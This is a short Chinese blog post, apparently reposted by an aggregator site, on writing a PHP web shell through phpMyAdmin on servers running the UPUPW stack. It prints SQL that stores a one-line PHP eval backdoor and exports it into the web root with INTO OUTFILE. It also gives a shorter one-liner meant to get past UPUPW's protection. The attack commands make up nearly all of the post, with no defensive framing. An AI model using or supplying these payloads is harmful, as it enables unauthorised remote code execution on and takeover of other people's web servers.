upupw phpmyadmin写shell

Posted 可我浪费着我寒冷的年华

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了upupw phpmyadmin写shell相关的知识,希望对你有一定的参考价值。

废话:

upupw给我的感觉是一个充当了waf毁三观的垃圾程序。然而,我讨厌的程序,管理员都特别喜欢用。

你会发现直接用之前那套写shell的建表然后在值里添加shell代码写到一个路径不可以了。

CREATE TABLE `mysql`.`darkmoon` (`darkmoon1` TEXT NOT NULL );
INSERT INTO `mysql`.`darkmoon` (`darkmoon1` ) VALUES (‘<?php @eval($_POST[pass]);?>‘);
SELECT `darkmoon1` FROM `darkmoon` INTO OUTFILE ‘d:/wamp/www/exehack.php‘;
DROP TABLE IF EXISTS `darkmoon`;

直接可以使用:

select ‘<?php @eval($_POST[august])?>‘ into outfile ‘D://upupw/XXX.php‘;

 

以上是关于upupw phpmyadmin写shell的主要内容,如果未能解决你的问题,请参考以下文章

UPUPW数据库密码的修改

怎样在window中利用UPUPW安装PHP+MYSQL的web站

upupw nginx版怎么让它支持thinkPHP?

《Zend studio 12 + UPUPW+PHP5.4开发平台配置过程》

upupw7.0lnmp配置Yii2.0的坑

phpmyadmin4.6怎么安装配置